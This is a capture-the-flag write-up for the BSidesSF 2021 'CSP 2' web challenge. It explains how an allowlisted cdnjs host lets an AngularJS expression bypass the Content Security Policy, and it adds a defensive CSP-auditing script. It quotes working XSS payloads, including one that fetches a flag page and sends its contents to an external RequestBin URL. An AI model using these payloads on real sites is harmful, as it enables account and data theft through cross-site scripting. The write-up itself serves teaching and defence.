Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2) for writeup with images.

---

This challenge was similar to the last one: we need to send an XSS payload to an
admin to get the flag.

Checking the CSP this time we have:

```
script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report
```

This policy allows `script-src` from all of cdnjs.cloudflare.com. If we can use a
script hosted on that CDN to execute arbitrary JS, we win!
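To see why this policy fails, here is an added example (not part of the original writeup) that parses a CSP header and reports the script-loading allowances the challenge relied on: the whole-host CDN entry, `'unsafe-eval'`, and the missing `base-uri`. The nonce-based replacement policy is my own construction; `EXAMPLE_NONCE` is a placeholder for a per-response random value.

```javascript
// Added example (not from the original writeup): audit a CSP header for the
// allowances that made this challenge's policy bypassable.

// Allowing a public script CDN by host lets every library on it load, including
// AngularJS builds (cdnjs.cloudflare.com is the host from the challenge policy).
const PUBLIC_SCRIPT_CDNS = ["cdnjs.cloudflare.com"];

// Split "name v1 v2; name2 v3" into { name: [v1, v2], name2: [v3] }.
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const [name, ...values] = directive.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = values;
  }
  return policy;
}

// script-src inherits from default-src when it is not set explicitly.
function effectiveScriptSrc(policy) {
  return policy["script-src"] || policy["default-src"] || [];
}

// Return the weaknesses found in the script-loading part of the policy.
function auditCsp(header) {
  const policy = parseCsp(header);
  const scriptSrc = effectiveScriptSrc(policy);
  const findings = [];
  const hasNonceOrHash = scriptSrc.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));

  if (scriptSrc.includes("'unsafe-eval'")) findings.push("script-src allows 'unsafe-eval'");
  if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("script-src allows 'unsafe-inline' without a nonce or hash");
  }
  // 'strict-dynamic' makes host allowlists inert, so only check hosts without it.
  if (!scriptSrc.includes("'strict-dynamic'")) {
    for (const src of scriptSrc) {
      const stripped = src.replace(/^[a-z]+:\/\//i, "");
      const host = stripped.split("/")[0].toLowerCase();
      if (PUBLIC_SCRIPT_CDNS.includes(host) && !stripped.includes("/")) {
        findings.push(`script-src allows all of ${host} (hosts AngularJS, which evaluates expressions)`);
      }
    }
  }
  if (!policy["base-uri"]) findings.push("base-uri is not set");
  return findings;
}

// The challenge's policy as quoted above, and a nonce-based replacement (constructed).
const CHALLENGE_CSP = "script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report";
const HARDENED_CSP = "script-src 'nonce-EXAMPLE_NONCE' 'strict-dynamic'; default-src 'self'; object-src 'none'; base-uri 'none'; report-uri /csp_report";
```

Running `auditCsp(CHALLENGE_CSP)` yields three findings, while `auditCsp(HARDENED_CSP)` yields none, because with a nonce plus `'strict-dynamic'` the browser ignores host allowlists entirely.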

To do this we can load AngularJS from cdnjs and use an Angular expression to
evaluate arbitrary JS within the Angular context. Here's a simple example to test:

```html
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('alert(1)')()}}
```

This payload seems to work!

Now we just need to exfiltrate the flag with `fetch`, as in the last challenge.

```html
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('fetch("/csp-two-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/1m40bkh1?x=" + t))')()}}
```

Then we get the flag on RequestBin:

```
CTF{Can_Still_Pwn}
```